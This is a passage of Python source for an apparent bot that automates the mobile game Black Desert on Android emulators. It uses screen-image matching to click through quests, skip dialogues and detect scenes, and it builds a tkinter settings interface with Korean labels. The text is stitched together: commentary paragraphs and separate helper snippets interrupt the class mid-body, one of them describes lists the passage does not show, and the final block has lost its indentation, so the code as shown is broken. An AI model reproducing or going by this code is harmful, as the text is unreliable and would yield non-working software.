        '엘릭 제사장',
    ]
    tobeol_rank_list = [
        '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '10'
    ]
    muge_percentage_list = [
        '70', '80', '90', '100', '110', '120', '130', '140', '150'
    ]
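The class keeps several parallel lists, e.g. `item_rank_list` and `item_rank_color_list`, whose elements correspond by index. A small sketch of joining them into one lookup — `rank_color` is an assumed name and not part of the original class; the values are copied verbatim from the lists above:

```python
# Parallel lists as defined in the class body (rank names in Korean,
# matching colors as hex strings, index-aligned).
item_rank_list = ["낡은", "일반", "고급", "희귀", "유일", "전설", "신화"]
item_rank_color_list = ["#7d7d86", "#000000", "#759460", "#4880b6",
                        "#433e6f", "#d49e4a", "#de5f21"]

# zip() pairs the lists positionally, giving rank -> color in one dict.
rank_color = dict(zip(item_rank_list, item_rank_color_list))
```

Any code that currently does `item_rank_color_list[item_rank_list.index(rank)]` could use `rank_color[rank]` instead.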
    def __init__(self, game_name, game_data_name, window):
        lybgame.LYBGame.__init__(self, lybconstant.LYB_GAME_BLACKDESERT, lybconstant.LYB_GAME_DATA_BLACKDESERT, window)

    def process(self, window_image):
        rc = super(LYBBlackDesert, self).process(window_image)
        if rc < 0:
            return rc
        return rc
    def custom_check(self, window_image, window_pixel):
        # TODO: needs a "stay here longer" setting here
        (loc_x, loc_y), match_rate = self.locationOnWindowPart(
            self.window_image,
            self.resource_manager.pixel_box_dic['repeat_quest'],
            custom_flag=1,
            custom_rect=(240, 300, 280, 370)
        )
        if loc_x != -1:
            c_match_rate = self.rateMatchedResource(self.window_pixels, 'migung_success_scene')
            if c_match_rate > 0.9:
                self.logger.warn('미궁 클리어')
                return ''
            c_match_rate = self.rateMatchedResource(self.window_pixels, 'migung_success_scene_repeat_confirm_event')
            if c_match_rate > 0.9:
                self.logger.warn('미궁 다시하기')
                return ''
            is_repeat_quest = self.get_scene('main_scene').get_game_config(lybconstant.LYB_DO_STRING_BD_WORK + 'quest_repeat_boolean')
            # Use this to click without coordinate correction.
            # self.telegram_send('반복 의뢰 인식됨')
            # return -1
            if is_repeat_quest == True:
                self.logger.warn('반복 의뢰 계속하기: ' + str(match_rate))
                self.window.mouse_click(self.hwnd, loc_x, loc_y)
            else:
                (n_loc_x, n_loc_y), n_match_rate = self.locationOnWindowPart(
                    self.window_image,
                    self.resource_manager.pixel_box_dic['next_quest'],
                    custom_flag=1,
                    custom_rect=(240, 300, 280, 370)
                )
                if n_loc_x != -1:
                    self.logger.warn('반복 의뢰 그만하기: ' + str(n_match_rate))
                    self.window.mouse_click(self.hwnd, n_loc_x, n_loc_y)
                else:
                    self.logger.debug('next_quest not found: ' + str(n_match_rate))
                    self.window.mouse_click(self.hwnd, loc_x, loc_y)
            return 'repeat'
        # Revive in town
        # (loc_x, loc_y), match_rate = self.locationOnWindowPart(
        #     self.window_image,
        #     self.resource_manager.pixel_box_dic['buhwal_in_town'],
        #     custom_flag=1,
        #     custom_threshold=0.9,
        #     custom_rect=(350, 200, 400, 300)
        # )
        # if loc_x != -1:
        #     self.logger.warn('마을에서 부활: ' + str(match_rate))
        #     self.window.mouse_click(self.hwnd, loc_x, loc_y)
        #     return 'buhwal_in_town'
        # Detect the green exclamation-mark quest icon
        (loc_x, loc_y), match_rate = self.locationOnWindowPart(
            self.window_image,
            self.resource_manager.pixel_box_dic['green_quest'],
            custom_flag=1,
            custom_threshold=0.99,
            custom_rect=(240, 300, 280, 370)
        )
        if loc_x != -1:
            self.logger.warn('녹색 느낌표 퀘스트: ' + str(match_rate))
            self.window.mouse_click(self.hwnd, loc_x, loc_y)
            return 'green_quest'
        match_rate = self.rateMatchedResource(self.window_pixels, 'world_boss_success_scene')
        if match_rate > 0.9:
            return ''
        match_rate = self.rateMatchedPixelBox(self.window_pixels, "main_scene_moving", custom_top_level=255, custom_below_level=180)
        if match_rate > 0.9:
            return ''
        if not 'skip_event' in self.event_limit:
            self.event_limit['skip_event'] = time.time()
        # skip_limit = int(self.get_game_config(lybconstant.LYB_GAME_YEOLHYUL, lybconstant.LYB_DO_STRING_SKIP_PERIOD))
        skip_limit = 0
        if self.main_scene != None and self.main_scene.current_work != None:
            if self.main_scene.current_work == '토벌 게시판':
                match_rate = self.rateMatchedResource(self.window_pixels, 'tobeol_skip_loc', custom_below_level=200, custom_top_level=255)
                if match_rate > 0.99:
                    self.logger.warn('동영상 건너뛰기')
                    self.mouse_click('tobeol_skip')
                    return 'skip'
            elif self.main_scene.current_work == '메인 퀘스트':
                (loc_x, loc_y), skip_match_rate = self.locationResourceOnWindowPart(
                    self.window_image,
                    'npc_conversation_skip_loc',
                    custom_threshold=0.9,
                    custom_flag=1,
                    custom_top_level=(255, 255, 255),
                    custom_below_level=(130, 130, 130),
                    custom_rect=(570, 100, 635, 130)
                )
                # self.logger.info('npc_conversation_skip_loc' + ' ' + str((loc_x, loc_y)) + ' ' + str(skip_match_rate))
                if loc_x != -1:
                    if not 'npc_conversation_skip_loc' in self.event_limit:
                        self.event_limit['npc_conversation_skip_loc'] = 0
                    if time.time() - self.event_limit['npc_conversation_skip_loc'] > 5:
                        self.main_scene.lyb_mouse_click_location(loc_x, loc_y)
                        self.event_limit['npc_conversation_skip_loc'] = time.time()
                        return 'skip'
                    else:
                        return ''
                (loc_x, loc_y), skip_match_rate = self.locationResourceOnWindowPart(
                    self.window_image,
                    'tutorial_skip_loc',
                    custom_threshold=0.9,
                    custom_flag=1,
                    custom_rect=(570, 60, 610, 100)
                )
                if loc_x != -1:
                    if not 'tutorial_skip_loc' in self.event_limit:
                        self.event_limit['tutorial_skip_loc'] = 0
                    if time.time() - self.event_limit['tutorial_skip_loc'] > 10:
                        self.main_scene.lyb_mouse_click_location(loc_x, loc_y)
                        self.event_limit['tutorial_skip_loc'] = time.time()
                        return 'skip'
                    else:
                        return ''
                (loc_x, loc_y), skip_match_rate = self.locationResourceOnWindowPart(
                    self.window_image,
                    'tutorial_skip_loc',
                    custom_threshold=0.9,
                    custom_flag=1,
                    custom_rect=(30, 60, 70, 100)
                )
                if loc_x != -1:
                    if not 'tutorial_skip_loc' in self.event_limit:
                        self.event_limit['tutorial_skip_loc'] = 0
                    if time.time() - self.event_limit['tutorial_skip_loc'] > 10:
                        self.main_scene.lyb_mouse_click_location(loc_x, loc_y)
                        self.event_limit['tutorial_skip_loc'] = time.time()
                        return 'skip'
                    else:
                        return ''
        if time.time() - self.event_limit['skip_event'] > skip_limit:
            self.event_limit['skip_event'] = time.time()
            skip_loc_list = [
                'bottom_right_skip_loc',
                'bottom_right_skip_2_loc',
                'top_right_skip_loc',
            ]
            s = time.time()
            for each_loc in skip_loc_list:
                if not each_loc in self.event_limit:
                    self.event_limit[each_loc] = time.time()
                else:
                    # Only applies to skips occurring within 30 seconds
                    if time.time() - self.event_limit[each_loc] > 30:
                        self.set_option(each_loc + '_repeat', None)
                        # self.event_limit[each_loc + '_count'] += 1
                # adjust_level = int(self.get_game_config(lybconstant.LYB_GAME_TERA, lybconstant.LYB_DO_STRING_SKIP_LEVEL_ADJUST))
                # adjust_threshold = int(self.get_game_config(lybconstant.LYB_GAME_YEOLHYUL, lybconstant.LYB_DO_STRING_YH_THRESHOLD_NEXT)) * 0.01
                adjust_threshold = int(self.get_scene('main_scene').get_game_config(lybconstant.LYB_DO_STRING_BD_THRESHOLD + 'conversation')) * 0.01
                # print('[DEBUG] adjust_threshold=', adjust_threshold)
                # skip_match_rate = self.rateMatchedResource(
                #     window_pixel,
                #     each_loc,
                #     custom_below_level=adjust_level
                # )
                if each_loc == 'top_right_skip_loc':
                    each_rect = (500, 115, 535, 145)
                elif each_loc == 'bottom_right_skip_loc':
                    each_rect = (580, 350, 610, 385)
                elif each_loc == 'bottom_right_skip_2_loc':
                    each_rect = (380, 290, 535, 315)
                (loc_x, loc_y), skip_match_rate = self.locationResourceOnWindowPart(
                    self.window_image,
                    each_loc,
                    # custom_below_level=(100, 100, 100),
                    # custom_top_level=(255, 255, 255),
                    custom_threshold=adjust_threshold,
                    custom_flag=1,
                    custom_rect=each_rect
                )
                # self.logger.debug(str(skip_match_rate) + ':' + str(adjust_threshold))
                if loc_x != -1:
                    self.event_limit[each_loc] = time.time()
                    if each_loc != 'bottom_right_skip_loc':
                        self.logger.debug('skip: ' + str(each_loc) + ':' + str((loc_x, loc_y)) + ' ' + str(int(skip_match_rate * 100)) + '%')
                    if self.get_option(each_loc + '_repeat') == None:
                        self.set_option(each_loc + '_repeat', (loc_x, loc_y))
                        return ''
                    (last_loc_x, last_loc_y) = self.get_option(each_loc + '_repeat')
                    if last_loc_x == loc_x and last_loc_y == loc_y:
                        self.set_option(each_loc + '_repeat', None)
                        return ''
                    self.logger.debug('Clicked SKIP: ' + str(each_loc) + ':' + str((loc_x, loc_y)) + ' ' + str(int(skip_match_rate * 100)) + '%')
                    self.set_option(each_loc + '_repeat', None)
                    self.mouse_click(each_loc.replace('_loc', '', 1) + '_0')
                    return 'skip'
                else:
                    self.set_option(each_loc + '_repeat', None)
                # print('SKIP:', each_loc + ':' + str((loc_x, loc_y)) + ' ' + str(int(skip_match_rate * 100)) + '%')
            e = time.time()
            # self.logger.debug('ElapsedTime SKIP: ' + str(round(e - s, 2)))
        resource_name = 'download_patch_loc'
        (loc_x, loc_y), match_rate = self.locationResourceOnWindowPart(
            self.window_image,
            resource_name,
            custom_threshold=0.9,
            custom_flag=1,
            custom_rect=(230, 120, 400, 180)
        )
        if loc_x != -1:
            pb_name = 'download_patch_ok'
            (loc_x, loc_y), match_rate = self.locationOnWindowPart(
                self.window_image,
                self.resource_manager.pixel_box_dic[pb_name],
                custom_flag=1,
                custom_threshold=0.9,
                custom_rect=(320, 250, 420, 320)
            )
            if loc_x != -1:
                self.logger.warn('패치 다운로드: ' + str(match_rate))
                self.window.mouse_click(self.hwnd, loc_x, loc_y)
            return resource_name
        return ''
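Throughout `custom_check`, recognition thresholds are stored in the config as whole percentages (e.g. 85) and scaled by `0.01` before being compared against 0..1 match rates. A minimal sketch of that conversion as a standalone helper — `passes_threshold` is an assumed name used here for illustration only:

```python
def passes_threshold(match_rate, threshold_pct):
    # Configs store whole percents (e.g. 85); template-match rates are
    # floats in [0, 1], so scale the percent down before comparing.
    return match_rate >= threshold_pct * 0.01
```

This mirrors lines like `adjust_threshold = int(...get_game_config(...)) * 0.01` above.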
    def process_terminate_applications(self):
        max_app_close_count = self.common_config[lybconstant.LYB_DO_STRING_CLOSE_APP_COUNT]
        self.logger.debug('CloseMaxCount: ' + str(max_app_close_count))
        if self.player_type == 'nox':
            if self.terminate_status == 0:
                # self.mouse_click_with_cursor(660, 350)
                if self.side_hwnd == None:
                    self.logger.warn('녹스 사이드바 검색이 안되었기 때문에 종료 기능은 사용하지 못합니다.')
                    self.request_terminate = False
                    return
                self.window.mouse_click(self.side_hwnd, 16, 320)
                self.terminate_status += 1
            elif self.terminate_status > 0 and self.terminate_status < max_app_close_count:
                self.logger.info('녹스 앱들을 종료 중입니다.')
                self.window.mouse_drag(self.hwnd, 320, 270, 0, 270, 0.5)
                # self.window.mouse_click(self.hwnd, 630, 220, delay=2)
                # time.sleep(2)
                # self.window.mouse_click(self.hwnd, 550, 245)
                self.terminate_status += 1
            else:
                self.terminate_status = 0
                self.request_terminate = False
        elif self.player_type == 'momo':
            if self.terminate_status == 0:
                self.window.mouse_click(self.parent_hwnd, 660, 355)
                # self.move_mouse_location(660, 355)
                self.terminate_status += 1
            elif self.terminate_status > 0 and self.terminate_status < max_app_close_count:
                self.logger.info('모모 앱들을 종료 중입니다.')
                self.window.mouse_drag(self.hwnd, 320, 270, 0, 270, 0.5)
                self.terminate_status += 1
            else:
                self.terminate_status = 0
                self.request_terminate = False
    def get_screen_by_location(self, window_image):
        scene_name = self.scene_tutorial_gisul_screen(window_image)
        if len(scene_name) > 0:
            return scene_name
        scene_name = self.scene_init_screen(window_image)
        if len(scene_name) > 0:
            return scene_name
        # Order matters!
        # scene_name = self.scene_event_and_reward_screen(window_image)
        # if len(scene_name) > 0:
        #     return scene_name
        # Order matters!
        # scene_name = self.scene_immu_start_screen(window_image)
        # if len(scene_name) > 0:
        #     return scene_name
        # scene_name = self.scene_main_screen(window_image)
        # if len(scene_name) > 0:
        #     return scene_name
        scene_name = self.scene_death_screen(window_image)
        if len(scene_name) > 0:
            return scene_name
        scene_name = self.scene_urewanryo_screen(window_image)
        if len(scene_name) > 0:
            return scene_name
        # scene_name = self.scene_geomungiun_screen(window_image)
        # if len(scene_name) > 0:
        #     return scene_name
        scene_name = self.scene_jamjeryeok_jeonsu_screen(window_image)
        if len(scene_name) > 0:
            return scene_name
        scene_name = self.scene_nejeongbo_screen(window_image)
        if len(scene_name) > 0:
            return scene_name
        scene_name = self.scene_select_ure_screen(window_image)
        if len(scene_name) > 0:
            return scene_name
        # scene_name = self.scene_hukjeongryoung_soksakim_screen(window_image)
        # if len(scene_name) > 0:
        #     return scene_name
        # return ''
        scene_name = self.scene_google_play_account_select(window_image)
        if len(scene_name) > 0:
            return scene_name
        scene_name = self.scene_jihwiso(window_image)
        if len(scene_name) > 0:
            return scene_name
        return ''
    # def scene_hukjeongryoung_soksakim_screen(self, window_image):
    #     match_rate = self.rateMatchedResource(self.window_pixels,
    #         'hukjeongryoung_soksakim_scene_loc',
    #         custom_below_level=(150, 150, 150),
    #         custom_top_level=(255, 255, 255),
    #         custom_tolerance=50)
    #     if match_rate > 0.7:
    #         self.logger.info('hukjeongryoung_soksakim_scene: ' + str(match_rate))
    #         return 'hukjeongryoung_soksakim_scene'
    #     return ''

    def scene_jihwiso(self, window_image):
        (loc_x, loc_y), match_rate = self.locationResourceOnWindowPart(
            self.window_image,
            'jihwiso_scene_loc',
            custom_threshold=0.7,
            custom_flag=1,
            custom_rect=(450, 40, 540, 80)
        )
        if match_rate > 0.7:
            self.logger.info('jihwiso_scene_loc: ' + str(match_rate))
            return 'jihwiso_scene'
        return ''

    def scene_tutorial_gisul_screen(self, window_image):
        match_rate = self.rateMatchedResource(self.window_pixels, 'tutorial_gisul_loc', custom_tolerance=50)
        if match_rate > 0.7:
            self.logger.info('tutorial_gisul_scene: ' + str(match_rate))
            return 'tutorial_gisul_scene'
        return ''

    def scene_select_ure_screen(self, window_image):
        (loc_x, loc_y), match_rate = self.locationResourceOnWindowPart(
            self.window_image,
            'select_ure_scene_loc',
            custom_threshold=0.7,
            custom_flag=1,
            custom_rect=(280, 50, 370, 150)
        )
        if match_rate > 0.7:
            self.logger.info('select_ure_scene: ' + str(match_rate))
            return 'select_ure_scene'
        return ''

    def scene_nejeongbo_screen(self, window_image):
        (loc_x, loc_y), match_rate = self.locationResourceOnWindowPart(
            self.window_image,
            'nejeongbo_scene_loc',
            custom_threshold=0.7,
            custom_flag=1,
            custom_rect=(50, 35, 115, 60)
        )
        if match_rate > 0.7:
            self.logger.info('nejeongbo_scene: ' + str(match_rate))
            self.current_matched_scene['name'] = 'nejeongbo_scene_loc'
            match_rate = self.rateMatchedResource(self.window_pixels, self.current_matched_scene['name'], weight_tolerance=self.weight_tolerance)
            self.current_matched_scene['rate'] = int(match_rate * 100)
            return 'nejeongbo_scene'
        return ''

    def scene_jamjeryeok_jeonsu_screen(self, window_image):
        (loc_x, loc_y), match_rate = self.locationResourceOnWindowPart(
            self.window_image,
            'jamjeryeok_jeonsu_scene_loc',
            custom_threshold=0.7,
            custom_flag=1,
            custom_rect=(50, 35, 115, 60)
        )
        if match_rate > 0.7:
            self.logger.info('jamjeryeok_jeonsu_scene: ' + str(match_rate))
            self.current_matched_scene['name'] = 'jamjeryeok_jeonsu_scene_loc'
            match_rate = self.rateMatchedResource(self.window_pixels, self.current_matched_scene['name'], weight_tolerance=self.weight_tolerance)
            self.current_matched_scene['rate'] = int(match_rate * 100)
            return 'jamjeryeok_jeonsu_scene'
        return ''

    # def scene_geomungiun_screen(self, window_image):
    #     (loc_x, loc_y), match_rate = self.locationResourceOnWindowPart(
    #         self.window_image,
    #         'geomungiun_scene_loc',
    #         custom_threshold=0.7,
    #         custom_flag=1,
    #         custom_rect=(50, 35, 115, 60)
    #     )
    #     if match_rate > 0.7:
    #         self.logger.info('geomungiun_scene: ' + str(match_rate))
    #         return 'geomungiun_scene'
    #     return ''

    def scene_death_screen(self, window_image):
        (loc_x, loc_y), match_rate = self.locationResourceOnWindowPart(
            self.window_image,
            'death_scene_loc',
            # custom_below_level=(130, 70, 60),
            # custom_top_level=(230, 120, 90),
            custom_threshold=0.7,
            custom_flag=1,
            custom_rect=(250, 170, 380, 200)
        )
        if match_rate > 0.7:
            self.logger.info('death_scene: ' + str(match_rate))
            return 'death_scene'
        return ''
    # def scene_immu_start_screen(self, window_image):
    #     (loc_x, loc_y), match_rate = self.locationResourceOnWindowPart(
    #         self.window_image,
    #         'immu_start_scene_loc',
    #         # custom_below_level=(200, 200, 200),
    #         # custom_top_level=(255, 255, 255),
    #         custom_threshold=0.7,
    #         custom_flag=1,
    #         custom_rect=(220, 120, 420, 145)
    #     )
    #     if match_rate > 0.7:
    #         self.logger.info('immu_start_scene: ' + str(match_rate))
    #         return 'immu_start_scene'
    #     return ''

    # def scene_event_and_reward_screen(self, window_image):
    #     (loc_x, loc_y), match_rate = self.locationResourceOnWindowPart(
    #         self.window_image,
    #         'event_and_reward_scene_loc',
    #         # custom_below_level=(200, 200, 200),
    #         # custom_top_level=(255, 255, 255),
    #         custom_threshold=0.7,
    #         custom_flag=1,
    #         custom_rect=(260, 70, 380, 100)
    #     )
    #     if match_rate > 0.7:
    #         self.logger.info('event_and_reward_scene: ' + str(match_rate))
    #         return 'event_and_reward_scene'
    #     return ''

    def scene_urewanryo_screen(self, window_image):
        (loc_x, loc_y), match_rate = self.locationResourceOnWindowPart(
            self.window_image,
            'urewanryo_scene_loc',
            # custom_below_level=(200, 200, 200),
            # custom_top_level=(255, 255, 255),
            custom_threshold=0.7,
            custom_flag=1,
            custom_rect=(270, 100, 320, 200)
        )
        if match_rate > 0.7:
            self.logger.info('urewanryo_scene: ' + str(match_rate))
            return 'urewanryo_scene'
        return ''

    def scene_main_screen(self, window_image):
        s = time.time()
        (loc_x, loc_y), match_rate = self.locationResourceOnWindowPart(
            self.window_image,
            'main_scene_loc',
            # custom_below_level=(200, 200, 200),
            # custom_top_level=(255, 255, 255),
            custom_threshold=0.7,
            custom_flag=1,
            custom_rect=(430, 30, 635, 60)
        )
        e = time.time()
        self.logger.debug('ElapsedTime main_scene_loc: ' + str(round(e - s, 5)))
        if match_rate > 0.7:
            self.logger.debug('main scene: ' + str(match_rate))
            self.current_matched_scene['name'] = 'main_scene_loc'
            match_rate = self.rateMatchedResource(self.window_pixels, self.current_matched_scene['name'], weight_tolerance=self.weight_tolerance)
            self.current_matched_scene['rate'] = int(match_rate * 100)
            return 'main_scene'
        return ''
    def scene_init_screen(self, window_image):
        loc_x = -1
        loc_y = -1
        if self.player_type == 'nox':
            for each_icon in LYBBlackDesert.nox_bd_icon_list:
                (loc_x, loc_y), match_rate = self.locationOnWindowPart(
                    window_image,
                    self.resource_manager.pixel_box_dic[each_icon],
                    custom_threshold=0.8,
                    custom_flag=1,
                    custom_rect=(80, 110, 570, 300)
                )
                # print('[DEBUG] nox yh icon:', (loc_x, loc_y), match_rate)
                if loc_x != -1:
                    break
        elif self.player_type == 'momo':
            for each_icon in LYBBlackDesert.momo_bd_icon_list:
                (loc_x, loc_y), match_rate = self.locationOnWindowPart(
                    window_image,
                    self.resource_manager.pixel_box_dic[each_icon],
                    custom_threshold=0.8,
                    custom_flag=1,
                    custom_rect=(30, 40, 610, 300)
                )
                # print('[DEBUG] momo yh icon:', (loc_x, loc_y), match_rate)
                if loc_x != -1:
                    break
        if loc_x == -1:
            return ''
        return 'init_screen_scene'

    def scene_google_play_account_select(self, window_image):
        loc_x_list = []
        loc_y_list = []
        pb_name = 'google_play_letter'
        (loc_x, loc_y), match_rate = self.locationOnWindowPart(
            window_image,
            self.resource_manager.pixel_box_dic[pb_name],
            custom_flag=1,
            custom_rect=(150, 50, 490, 270)
        )
        # self.logger.warn(str((loc_x, loc_y)) + ':' + str(match_rate))
        # self.getImagePixelBox(pb_name).save(pb_name + '.png')
        loc_x_list.append(loc_x)
        loc_y_list.append(loc_y)
        for i in range(6):
            pb_name = 'google_play_letter_' + str(i)
            (loc_x, loc_y), match_rate = self.locationOnWindowPart(
                window_image,
                self.resource_manager.pixel_box_dic[pb_name],
                custom_flag=1,
                custom_rect=(150, 50, 490, 270)
            )
            # self.logger.warn(str((loc_x, loc_y)) + ':' + str(match_rate))
            # self.getImagePixelBox(pb_name).save(pb_name + '.png')
            loc_x_list.append(loc_x)
            loc_y_list.append(loc_y)
        for each_loc in loc_x_list:
            if each_loc == -1:
                return ''
        return 'google_play_account_select_scene'

    def clear_scene(self):
        last_scene = self.scene_dic
        self.scene_dic = {}
        for scene_name, scene in last_scene.items():
            if ('google_play_account_select_scene' in scene_name or
                    'logo_screen_scene' in scene_name or
                    'connect_account_scene' in scene_name):
                self.scene_dic[scene_name] = last_scene[scene_name]

    def add_scene(self, scene_name):
        self.scene_dic[scene_name] = lybscene.LYBBlackDesertScene(scene_name)
        self.scene_dic[scene_name].setLoggingQueue(self.logging_queue)
        self.scene_dic[scene_name].setGameObject(self)
class LYBBlackDesertTab(lybgame.LYBGameTab):
    def __init__(self, root_frame, configure, game_options, inner_frame_dics, width, height, game_name=lybconstant.LYB_GAME_BLACKDESERT):
        lybgame.LYBGameTab.__init__(self, root_frame, configure, game_options, inner_frame_dics, width, height, game_name)

    def set_work_list(self):
        lybgame.LYBGameTab.set_work_list(self)
        for each_work in LYBBlackDesert.work_list:
            self.option_dic['work_list_listbox'].insert('end', each_work)
            self.configure.common_config[self.game_name]['work_list'].append(each_work)

    def set_option(self):
        ###############################################
        # Main quest progress                         #
        ###############################################
        frame = ttk.Frame(self.inner_frame_dic['frame_top'], relief=self.frame_relief)
        frame.pack(anchor=tkinter.W)
        # PADDING
        frame = ttk.Frame(
            master=self.master,
            relief=self.frame_relief
        )
        frame.pack(pady=5)
        self.inner_frame_dic['options'] = ttk.Frame(
            master=self.master,
            relief=self.frame_relief
        )
        self.option_dic['option_note'] = ttk.Notebook(
            master=self.inner_frame_dic['options']
        )
        self.inner_frame_dic['common_tab_frame'] = ttk.Frame(
            master=self.option_dic['option_note'],
            relief=self.frame_relief
        )
        self.inner_frame_dic['hunt_tab_frame'] = ttk.Frame(
            master=self.option_dic['option_note'],
            relief=self.frame_relief
        )
        self.inner_frame_dic['hunt2_tab_frame'] = ttk.Frame(
            master=self.option_dic['option_note'],
            relief=self.frame_relief
        )
        self.inner_frame_dic['work_tab_frame'] = ttk.Frame(
            master=self.option_dic['option_note'],
            relief=self.frame_relief
        )
        self.inner_frame_dic['work2_tab_frame'] = ttk.Frame(
            master=self.option_dic['option_note'],
            relief=self.frame_relief
        )
        self.inner_frame_dic['tobeol_tab_frame'] = ttk.Frame(
            master=self.option_dic['option_note'],
            relief=self.frame_relief
        )
        self.inner_frame_dic['notify_tab_frame'] = ttk.Frame(
            master=self.option_dic['option_note'],
            relief=self.frame_relief
        )
        self.inner_frame_dic['common_tab_frame'].pack(anchor=tkinter.NW, fill=tkinter.BOTH, expand=True)
        self.option_dic['option_note'].add(self.inner_frame_dic['common_tab_frame'], text='일반')
        self.inner_frame_dic['hunt_tab_frame'].pack(anchor=tkinter.NW, fill=tkinter.BOTH, expand=True)
        self.option_dic['option_note'].add(self.inner_frame_dic['hunt_tab_frame'], text='자동 사냥')
        self.inner_frame_dic['hunt2_tab_frame'].pack(anchor=tkinter.NW, fill=tkinter.BOTH, expand=True)
        self.option_dic['option_note'].add(self.inner_frame_dic['hunt2_tab_frame'], text='자동 사냥2')
        self.inner_frame_dic['work_tab_frame'].pack(anchor=tkinter.NW, fill=tkinter.BOTH, expand=True)
        self.option_dic['option_note'].add(self.inner_frame_dic['work_tab_frame'], text='작업별 설정')
        self.inner_frame_dic['work2_tab_frame'].pack(anchor=tkinter.NW, fill=tkinter.BOTH, expand=True)
        self.option_dic['option_note'].add(self.inner_frame_dic['work2_tab_frame'], text='작업별 설정2')
        self.inner_frame_dic['tobeol_tab_frame'].pack(anchor=tkinter.NW, fill=tkinter.BOTH, expand=True)
        self.option_dic['option_note'].add(self.inner_frame_dic['tobeol_tab_frame'], text='토벌 게시판')
        self.inner_frame_dic['notify_tab_frame'].pack(anchor=tkinter.NW, fill=tkinter.BOTH, expand=True)
        self.option_dic['option_note'].add(self.inner_frame_dic['notify_tab_frame'], text='알림')
        frame_head = ttk.Frame(self.inner_frame_dic['common_tab_frame'])
        frame_left = ttk.Frame(frame_head)
        frame_label = ttk.LabelFrame(frame_left, text='인식 허용률(%)')
        frame = ttk.Frame(frame_label)
        label = ttk.Label(
            master=frame,
            text=self.get_option_text("메인퀘스트 관련 이미지")
        )
        label.pack(side=tkinter.LEFT)
        self.option_dic[lybconstant.LYB_DO_STRING_BD_THRESHOLD + 'main_quest'] = tkinter.StringVar(frame)
        self.option_dic[lybconstant.LYB_DO_STRING_BD_THRESHOLD + 'main_quest'].trace(
            'w', lambda *args: self.callback_threshold_mainquest_stringvar(args, lybconstant.LYB_DO_STRING_BD_THRESHOLD + 'main_quest')
        )
        if not lybconstant.LYB_DO_STRING_BD_THRESHOLD + 'main_quest' in self.configure.common_config[self.game_name]:
            self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_THRESHOLD + 'main_quest'] = 70
        combobox_list = []
        for i in range(50, 91):
            combobox_list.append(str(i))
        combobox = ttk.Combobox(
            master=frame,
            values=combobox_list,
            textvariable=self.option_dic[lybconstant.LYB_DO_STRING_BD_THRESHOLD + 'main_quest'],
            state="readonly",
            height=10,
            width=3,
            font=lybconstant.LYB_FONT
        )
        combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_THRESHOLD + 'main_quest'])
        combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
        frame.pack(anchor=tkinter.W)
        frame = ttk.Frame(frame_label)
        label = ttk.Label(
            master=frame,
            text=self.get_option_text("대화 건너뛰기 이미지")
        )
        label.pack(side=tkinter.LEFT)
        self.option_dic[lybconstant.LYB_DO_STRING_BD_THRESHOLD + 'conversation'] = tkinter.StringVar(frame)
        self.option_dic[lybconstant.LYB_DO_STRING_BD_THRESHOLD + 'conversation'].trace(
            'w', lambda *args: self.callback_threshold_conversation_stringvar(args, lybconstant.LYB_DO_STRING_BD_THRESHOLD + 'conversation')
        )
        if not lybconstant.LYB_DO_STRING_BD_THRESHOLD + 'conversation' in self.configure.common_config[self.game_name]:
            self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_THRESHOLD + 'conversation'] = 85
        combobox_list = []
        for i in range(50, 91):
            combobox_list.append(str(i))
        combobox = ttk.Combobox(
            master=frame,
            values=combobox_list,
            textvariable=self.option_dic[lybconstant.LYB_DO_STRING_BD_THRESHOLD + 'conversation'],
            state="readonly",
            height=10,
            width=3,
            font=lybconstant.LYB_FONT
        )
        combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_THRESHOLD + 'conversation'])
        combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
        frame.pack(anchor=tkinter.W)
        frame = ttk.Frame(frame_label)
        label = ttk.Label(
            master=frame,
            text=self.get_option_text("전흔, 채광, 채집, 벌목 이미지")
        )
        label.pack(side=tkinter.LEFT)
        self.option_dic[lybconstant.LYB_DO_STRING_BD_THRESHOLD + 'combat_box'] = tkinter.StringVar(frame)
        self.option_dic[lybconstant.LYB_DO_STRING_BD_THRESHOLD + 'combat_box'].trace(
            'w', lambda *args: self.callback_threshold_combat_box_stringvar(args, lybconstant.LYB_DO_STRING_BD_THRESHOLD + 'combat_box')
        )
        if not lybconstant.LYB_DO_STRING_BD_THRESHOLD + 'combat_box' in self.configure.common_config[self.game_name]:
            self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_THRESHOLD + 'combat_box'] = 70
        combobox_list = []
        for i in range(50, 91):
            combobox_list.append(str(i))
        combobox = ttk.Combobox(
            master=frame,
            values=combobox_list,
            textvariable=self.option_dic[lybconstant.LYB_DO_STRING_BD_THRESHOLD + 'combat_box'],
            state="readonly",
            height=10,
            width=3,
            font=lybconstant.LYB_FONT
        )
        combobox.set(self.configure.common_config[self.game_name][lybconstant.LYB_DO_STRING_BD_THRESHOLD + 'combat_box'])
        combobox.pack(anchor=tkinter.W, side=tkinter.LEFT)
        frame.pack(anchor=tkinter.W)
        frame_label.pack(anchor=tkinter.NW, padx=5, pady=5)
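Each option row above repeats the same two non-GUI steps: build a list of string values for the combobox and seed a default into the config dict if the key is missing. A sketch of those steps as helpers — `percent_values` and `ensure_default` are assumed names for illustration, not part of the original code:

```python
def percent_values(lo=50, hi=91):
    # Mirrors the repeated "for i in range(50, 91): combobox_list.append(str(i))"
    # loops: comboboxes take string values.
    return [str(i) for i in range(lo, hi)]

def ensure_default(config, key, default):
    # Mirrors the repeated "if not key in config: config[key] = default" guard.
    if key not in config:
        config[key] = default
    return config[key]
```

With these, each row would reduce to one `percent_values(...)` call plus one `ensure_default(...)` call before constructing the `ttk.Combobox`.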
frame_label = ttk.LabelFrame(frame_left, text='상태 체크(회)')
frame = ttk.Frame(frame_label)
label = ttk.Label(
master = frame,
text = self.get_option_text("자동 태세 전 수동 체크 횟수")
)
label.pack(side=tkinter.LEFT)
self.option_dic[lybconstant.LYB_DO_STRING_BD_THRESHOLD + 'sudong_limit'] = tkinter.StringVar(frame)
self.option_dic[lybconstant.LYB_DO_STRING_BD_THRESHOLD + 'sudong_limit'].trace(
'w', lambda *args: self.callback_threshold_sudong_limit_stringvar(args, lybconstant.LYB_DO_STRING_BD_THRESHOLD + 'sudong_limit')
)
